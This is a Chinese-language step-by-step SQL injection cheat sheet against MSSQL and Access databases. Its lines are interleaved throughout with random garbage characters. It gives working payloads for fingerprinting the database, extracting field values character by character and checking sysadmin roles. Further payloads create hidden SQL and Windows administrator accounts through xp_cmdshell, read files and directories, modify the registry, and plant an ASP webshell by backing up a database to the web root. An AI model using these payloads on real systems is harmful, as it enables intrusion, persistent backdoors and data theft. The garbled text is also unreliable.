1.判断是否有注入;and 1=1 ;and 1=2 �`�'[ �7�M
2.初步判断是否是mssql ;and user>0 w`�Dzk.��2
-j9�R%+YW<
3.注入参数是字符'and [查询条件] and ''=' ]eq3c�wR[|
\0pJ+@\�T9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Wi�L~b
=fT
P
�+ n�T%
5.判断数据库系统 O���,[aL;v
X��3Vpxt�b
;and (select count(*) from sysobjects)>0 mssql n.y72-&�v�
A�sM""x1Ix
;and (select count(*) from msysobjects)>0 access �hGF��(E*�
viBf��"��.
N3H!ptn�37
>�}/"g��x
6.猜数据库 ;and (select Count(*) from [数据库名])>0 +*��
)Qi)�
"��Fa�G5X(
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 RS�/%ux�S?
Nu��{��RF
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 |[�����|X�
'F�+O�+-p+
9.(1)猜字段的ascii值(access) �/7�h%s�CX
|P2��GL3NR
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ^ :Q |,oy�
'
n�~N*DH�
(2)猜字段的ascii值(mssql) h�3xX26l�
4#=!�VK8ZH
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 X�b3vvHdI�
�eeb�8�v:4
10.测试权限结构(mssql) �#
dxlU/*�
|�_~BV&g,N
$zz��=>BOk
.?S#DS� �)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- sa�+�:c{��
AJ:@c7:�eS
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- $b$r�,��mc
�yZFv�pw|g
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- tQJ@//C�\z
+.\JYH=yEr
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
v-[|7Pg}Z
OG 5n�9sx
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- rf1nC$Sop
;Xgy�2'3��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �g)�&�-S3\
�uD:O[H-�x
;and 1=(select IS_MEMBER('db_owner'));-- IN�zQ0�z-z
!1"~tA!+p=
`U`Z9q��5-
9LJ�/m�\bi
11.添加mssql和系统的帐户 =4�JVU�u~Z
+M�m0�bqNN
;exec master.dbo.sp_addlogin username;-- 4b3p,�$BWS
;exec master.dbo.sp_password null,username,password;-- �<k^�9l6@�
WM=��kr$/3
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- >o>'@)I?e6
o
�ohf)�)
;exec master.dbo.xp_cmdshell 'net user username password B{1+���0k�
6x/ �X8�zu
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 6nG�D�o�W#
r�zaEVXbz1
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ! 2��Y,
a
l�/rhA6kEU
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �g�YzKUX@�
9f�l !�CG�
{Y'_QW1:2�
�!Fp�MO`�m
12.(1)遍历目录 4
<]QMA0��
��e�$>5G�M
;create table dirs(paths varchar(100), id int) �F/EHU?_EI
[S</Q��S!�
;insert dirs exec master.dbo.xp_dirtree 'c:\' nI_Zk.R��
p-�KuCobz]
;and (select top 1 paths from dirs)>0 29Q5s$�YD@
[�sN�n^�x�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) n�{'�
[[2U
}.b[a�z\T�
�H ��V���
Y��@.���JW
(2)遍历目录 i,yK&*>J�J
$���V~�%�$
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Fx3�VQ'%J�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 s.GhquFCrU
�At bqj?��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 4qm5`o\h�b
eEc;�w#��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �5&9(d_#�H
Ca1)>1��Vz
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 u5CT7_�#)�
&��_90���E
>2g ���CM�
�b0t];Gc%b
13.mssql中的存储过程 ���H8-�,gV
%] #;�
~I%
xp_regenumvalues 注册表根键, 子键 �.cZ�&~ �N
;_Rx|~!��!
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 1@nR.v�"$�
p�6HZ2Q:�a
xp_regread 根键,子键,键值名 �?pF��;{�
e&0B4wVA�Q
;exec xp_regread ���z�w5~|<
��Le3S;SY&
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 A�oo�'i���
��W��X\%FJ
xp_regwrite 根键,子键, 值名, 值类型, 值 �)E[5�lD61
�n�3|~X�/I
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ZXU�e4@qfl
l�
E&���hw
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 '�g=�y�J��
IYQYW�.`ly
xp_regdeletevalue 根键,子键,值名 �~y|��%D;
A|�>��C�3S
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 q9�0S>�c�,
rf`Br�\g�8
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �nL:vRJr-$
4
^+�hw�;�
��MW4dPoa
�PZ o�g��N
14.mssql的backup创建webshell �9�3!��a�
X����
]a>�
use model .y\H��Q^j
_E30t( _.�
create table cmd(str image); k]>k1Mi�=�
;Q"F�@v}18
insert into cmd(str) values (''); �(%P*�� rl
`r�iv`+J{s
backup database model to disk='c:\l.asp'; H_AV���3
;
�VG8rd'Z��
O\D(�{>���
no/]�Me!j=
15.mssql内置函数 \iL�,l8�7
�~�F(+uJbO
;and (select @@version)>0 获得Windows的版本号 RV$�+g�.4�
��"�FXS;Jf
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �tAC,'im:*
� C��M�g83
;and (select user_name())>0 爆当前系统的连接用户 rvm�I��
8�
KOmP-q��=6
;and (select db_name())>0 得到当前连接的数据库 18�n84RkI9
�`Eu(r�]:W
Gz6GU.IyQy
�{�//F>5~[
16.简洁的webshell �8�uGPy�H�
6�szkE{-/?
use model LN��N:GD)>
oOL3O@)�w>
create table cmd(str image); Z~�,.l�
�)R ��+o8C
insert into cmd(str) values (''); s��T��A/2d
#y*�=UV|�h
backup database model to disk='g:\wwwtest\l.asp';
